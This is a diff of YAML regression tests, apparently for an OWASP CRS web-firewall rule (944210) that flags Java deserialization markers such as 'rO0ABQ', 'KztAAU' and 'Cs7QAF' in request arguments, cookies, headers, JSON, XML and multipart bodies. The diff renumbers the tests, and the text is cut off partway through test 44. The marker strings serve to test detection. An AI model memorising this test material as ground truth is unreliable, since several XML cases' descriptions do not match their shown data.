-----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-17 + rO0ABQ + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_id: 17 desc: "Content-Type multipart/form-data XML element value includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - rO0ABQ - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-18 + rO0ABQ + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_id: 18 desc: "Argument test includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=KztAAU" - output: - log_contains: "id \"944210\"" - - test_title: 944210-19 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=KztAAU" + output: + log_contains: "id \"944210\"" + - test_id: 19 desc: "Argument name includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "KztAAU=test" - output: - log_contains: "id \"944210\"" - - test_title: 944210-20 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "KztAAU=test" + output: + log_contains: "id \"944210\"" + - test_id: 20 desc: "Cookie test includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=KztAAU - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-21 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=KztAAU + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_id: 21 desc: "Cookie name includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: KztAAU=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-22 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: KztAAU=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_id: 22 desc: "Request header test includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: KztAAU - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-23 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: KztAAU + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_id: 23 desc: "XML element includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944210\"" - - test_title: 944210-24 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944210\"" + - test_id: 24 desc: "XML attribute name includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944210\"" - - test_title: 944210-25 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944210\"" + - test_id: 25 desc: "XML attribute value includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-26 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944210\"" + - test_id: 26 desc: "XML element value includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "KztAAU" - output: - log_contains: "id \"944210\"" - - test_title: 944210-27 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "KztAAU" + output: + log_contains: "id \"944210\"" + - test_id: 27 desc: "Nested XML element value includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "KztAAU" - output: - log_contains: "id \"944210\"" - - test_title: 944210-28 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "KztAAU" + output: + log_contains: "id \"944210\"" + - test_id: 28 desc: "Content-Type text/plain includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=KztAAU" - output: - log_contains: "id \"944210\"" - - test_title: 944210-29 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=KztAAU" + output: + log_contains: "id \"944210\"" + - test_id: 29 desc: "Content-Type application/json arg value includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"KztAAU\"}" - output: - log_contains: "id \"944210\"" - - test_title: 944210-30 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"KztAAU\"}" + output: + log_contains: "id \"944210\"" + - test_id: 30 desc: "Content-Type application/json arg name includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"KztAAU\": \"test\"}" - output: - log_contains: "id \"944210\"" - - test_title: 944210-31 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"KztAAU\": \"test\"}" + output: + log_contains: "id \"944210\"" + - test_id: 31 desc: "Content-Type multipart/form-data json arg name includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"KztAAU": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-32 + {"KztAAU": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_id: 32 desc: "Content-Type multipart/form-data json arg value includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"KztAAU": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-33 + {"KztAAU": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_id: 33 desc: "Content-Type multipart/form-data XML element value includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - KztAAU - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-34 + KztAAU + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_id: 34 desc: "Content-Type multipart/form-data XML element value includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - KztAAU - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-35 + KztAAU + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_id: 35 desc: "Argument test includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Cs7QAF" - output: - log_contains: "id \"944210\"" - - test_title: 944210-36 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Cs7QAF" + output: + log_contains: "id \"944210\"" + - test_id: 36 desc: "Argument name includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Cs7QAF=test" - output: - log_contains: "id \"944210\"" - - test_title: 944210-37 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Cs7QAF=test" + output: + log_contains: "id \"944210\"" + - test_id: 37 desc: "Cookie test includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Cs7QAF - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-38 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Cs7QAF + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_id: 38 desc: "Cookie name includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Cs7QAF=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-39 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Cs7QAF=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_id: 39 desc: "Request header test includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Cs7QAF - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-40 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Cs7QAF + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_id: 40 desc: "XML element includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944210\"" - - test_title: 944210-41 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944210\"" + - test_id: 41 desc: "XML attribute name includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944210\"" - - test_title: 944210-42 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944210\"" + - test_id: 42 desc: "XML attribute value includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-43 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944210\"" + - test_id: 43 desc: "XML element value includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Cs7QAF" - output: - log_contains: "id \"944210\"" - - test_title: 944210-44 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Cs7QAF" + output: + log_contains: "id \"944210\"" + - test_id: 44 desc: "Nested XML element value includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 